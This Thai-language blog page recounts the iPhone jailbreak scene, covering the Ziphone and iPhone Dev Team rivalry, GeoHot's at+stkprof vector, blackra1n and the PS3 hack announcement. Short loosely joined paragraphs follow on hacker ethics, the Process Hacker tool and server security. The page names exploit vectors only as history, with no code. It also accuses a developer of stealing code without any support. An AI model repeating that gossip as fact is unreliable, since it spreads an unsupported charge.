วิธี นี้ใช้ BUG ของ iBoot ของ Apple ในการ inject vector ดังนั้นใน update ครั้งต่อไป Apple ต้องปิดรูรั่วนี้แน่ วิธีนี้จึงไม่ยั่งยืน
iPhone Dev Team รู้ว่าเมื่อ OS รุ่นใหม่ออก Ziphone ใช้ไม่ได้แน่ และ Zibri ก็คงไม่มีปัญญาทำอะไรได้ จึงรอขย้ำอย่างใจเย็น
Zibri คุยโขมงโฉงเฉง แต่ในหมู่ Hacker ส่วนใหญ่จะหัวเราะเยาะครับ ว่า OS ใหม่ออก มรึงตายแน่... ตอนนั้น Zibri เพ้อเจ้อมาก
iPhone Dev Team คาดการณ์ถูก แต่กะเวลาผิด Apple ใช้เวลาไปครึ่งปีในการ update OS ตอนนั้น Ziphone จึงดังระเบิดไปในช่วงว่างนั้น
ช่วง เวลาที่รอนั้นทำให้ Ziphone โด่งดังและได้ประโยชน์ไปหลายตังค์ iPhone Dev Team ต้องรออย่างแค้นใจ แต่ต้องทนเพราะไม่อยากออกวิธีใหม่ให้เห็น
ตอนนั้น iPhone Dev Team ทำ QuickPwn แล้ว โดยใช้ FEATURES ของ iBoot เอง จึงแน่ใจว่า Apple แก้ไม่ได้แน่ นอกจากทำ Hardware ใหม่
ชัย ชนะเป็นของ iPhone Dev Team QuickPwn ชนะใส Ziphone ใช้ไม่ได้อีกต่อไปหลังจาก Apple update OS เหลือแต่ QuickPwn กับ Pwnage ทีใช้ได้
ในโลกของ Hacker นั้น เหยียดหยาม Zibri มาก เพราะเป็นที่รู้กันว่า Zibri นั้นทำ Ziphone จาก code ที่ขโมยมาโดยไม่เข้าใจการทำงานของมันซะด้วยซ้ำไป
ดังนั้นตำนานของ Ziphone จึงจบลงอย่างน่าอดสู...
ทีนี้มาถึงตอนที่ Apple ออก iPhone 3G ก็พบว่า iPhone Dev Team นั้นเหมือนกับเจอทางตัน ไม่สามารถ Hack ได้สำเร็จ...
ช่วงนั้นเครียดไปทั้งโลกครับ อยากใช้ใจแทบขาด iPhone Dev Team ก็ดูเหมือนจะอึกๆอักๆ ท่าทางไม่รอดแน่ครับ
อยู่ๆ Hotz ก็เปิด website yiphone ขึ้นมา ทำ counter ว่า ถ้า counter ถึงศุนย์เมื่อไร iPhone Dev Team ยังไม่สามารถ hack ได้กรูจะ Hack ให้ดู...
แน่นอน..เมื่อ counter เป็นศูนย์ iPhone Dev Team ไม่สามารถ release ได้ GeoHot จึงเปิดช่องโหว่ของ iPhone 3G ออกมาให้ทราบกัน
ช่องโหว่นั้นคือ คำสั่ง at+stkprof ซึ่งสามารถใช้ inject vector สำหรับ payload ได้
iPhone Dev Team ออก iPhone 3G unlock สำเร็จ และตามด้วย YellowSn0w มีขอบคุณ GeoHot ว่า “thanks geohot for at+stkprof 02:28 injection vector”
ตั้งแต่นั้นมาโลกของ Hacker ก็จับตาไอ้หนูมหัศจรรย์คนนี้ทันทีครับ GeoHot กลายเป็น Hacker ในตำนานไปแล้ว แต่นั่นเป็นแค่จุดเริ่มต้น
พอ 3GS ออก ทีมอื่นก็อึกอักอีกตามเคย... 3 ก.ค. 2009 Hotz ประกาศตัว purplera1n ซึ่งเป็น software unlock ตัวแรกสำหรับ 3GS
ความยิ่งใหญ่ยังไม่จบ...วันที่ 11 ตุลาคม 2009 Hotz ประกาศเปิดตัว blackra1n สำหรับ jailbreak iPhone และ iPod Touches ทุกรุ่น
คำประกาศนั้นเป็นการประกาศความยิ่งใหญ่ ที่อหังการ์และโอหังมากที่สุดครั้งหนึ่งในประวัติศาสต์ของ Hacker
Hotz เรียกร้องว่าจะออกโปรแกรม ต่อเมื่อ tag “#blackra1n” ขึ้น Twitter Trends อันดับ 1 เท่านั้น
แน่นอน ไม่กี่ชั่วโมงหลังจากนั้น คนทั้งโลกก็มอบเกียรตินั้นให้ Hacker ที่ร้อนแรงที่สุดในโลก
“#blackra1n” ขึ้น Treands อันดับหนึ่งของ Twittter ไปอย่างง่ายดาย และ blackra1n ก็ออกมาให้เราใช้กัน
geohot, hacker ผู้โด่งดัง ได้รับเกียรติจากคนทั้งโลกครับ...
วัน Halloween ปีนั้น Hotz ออก Blacksn0w ซึ่งเป็น SIM unlcok สำหรับ iPhone ทุกรุ่นในตลาด...
เป็นอีกครั้งหนึ่งที่ geohot เรียกร้องคนทั้งโลกให้ trends อันดับหนึ่งแก่เขาอีกครั้งหนึ่งเพื่อเป็นเกียรติ...
...แน่นอน ไม่กี่นาทีหลังจากออก #blacksn0w ก็ขึ้นอันดับหนึ่ง Twitter Trends
ในปีที่ผ่านมากล่าวได้ว่าไม่มีใคร Hot ไปกว่า Hacker คนนี้อีกแล้วครับ ... GeoHot หนุ่มน้อย Hacker วัย 20 ปีเท่านั้น
มาปีนี้แค่ต้นปี GeoHot ก็ประกาศศักดาอีกครั้งครับ...
Hotz ประกาศเมื่อสองวันก่อน (22 มกราคม 2010) ว่า เค้า Hack Sony PS3 สำเร็จแล้ว... แน่นอนครับทั้งโลกกำลังจับตามองความสนุกรอบใหม่จาก GeoHot

ตัว ผมเองไม่มีความรู้ถึงขนาดนั้นคงไม่สามารถไปแนะนำใครได้ ก็ได้แต่หวังว่าคนที่มีความรู้คงจะเอาความรู้ที่มีไปใช้ให้มันถูกทาง ไม่เดือดร้อนคนอื่นก็แล้วกัน จะขาวจะดำก็เรื่องของคุณ แต่ขอบอกนะ ไม่เห็นหมวกดำคนไหนรอดคุกสักคน ที่เห็นๆนี่โดนคุกทุกคน น้อยมากอยู่ที่ความสำนึก
Process Hacker คือ ชุดโปรแกรม มีหน้าตาหรือไม่มีก็ได้มันงานเองก็ได้รอคำสั่งเรียกจากคุณก็ได้แล้วแต่ว่า เขียนมายังไง โปรเซสบางตัวมันน่ากลัวว่าจะประสงค์ร้ายก็เลยมีโปรแกรมสอดแนมโปรเซส 1 ในนั้นก็คือ Process Hacker

ในปัจจุบัน "แฮกเกอร์" นั้นใช้ใน 2 ความหมายหลัก ในทางที่ดี และ  ไม่ค่อยดีนัก ความหมายที่เป็นที่นิยม และพบได้บ่อยในสื่อนั้น มักจะไม่ดี  โดยจะหมายถึง อาชญากรคอมพิวเตอร์. ส่วนในทางที่ดีนั้น  "แฮกเกอร์"ยังใช้ในลักษณะของคำติดปาก หมายถึง ความเป็นพวกพ้อง หรือ  สมาชิกของกลุ่มคอมพิวเตอร์. นอกเหนือจากนี้ คำว่า "แฮกเกอร์"  ยังใช้หมายถึงกลุ่มของผู้ใช้คอมพิวเตอร์  โดยเฉพาะโปรแกรมเมอร์ที่มีความสามารถในระดับผู้เชี่ยวชาญ ตัวอย่างเช่น "นายลินัส ทอร์วอลด์ (Linus Torvalds) ผู้สร้างลินุกซ์ นั้นเป็นแฮกเกอร์อัจฉริยะ"

แม้ ผมจะรู้อะไรเพิ่มขึ้นมากมาย เกี่ยวกับการรักษาความปลอดภัยในระบบ  ก็ไม่ได้หมายความว่าระบบของผมจะปลอดภัยโดยสมบูรณ์  เพราะผมไม่ได้เขียนระบบปฏิบัติการขึ้นใช้เอง เพียงแต่ไปนำ Linux  ที่ถูกใช้กันมากที่สุด นำมาติดตั้ง และเปิดให้บริการ และบริการที่ผมพยายามเปิดนั้นมีมาก จนไม่แน่ใจว่าจะต้องปิดอะไรบ้าง  จึงจะปลอดภัย เพราะผู้รู้มากมายบอกผมว่าต้องไม่บริการจึงจะปลอดภัย  แต่ผมก็ยังดื้อ เพราะจำเป็นต้องเปิดบริการ และยังไม่แน่ใจว่าเปิดอะไร  แล้วจะถูก hack ได้บ้าง หากระบบของผมจะถูก hack อีก ก็เป็นเรื่องปกติ เพราะได้ทำระบบ  เพื่อเปิดให้เข้ามาศึกษา ไม่ได้ทำระบบเพื่อการค้า  ที่ต้องความคุมความปลอดภัยแบบเต็มร้อย ระบบที่มีการควบคุมแบบเต็มร้อย  จะมีข้อจำกัดมากมาย ซึ่งผมไม่ต้องการให้ระบบของผมเป็นอย่างนั้น ..  เพราะอาจทำให้ผู้ใช้อึดอัด เหมือนที่หลายองค์กรเป็น

AddThis

Share |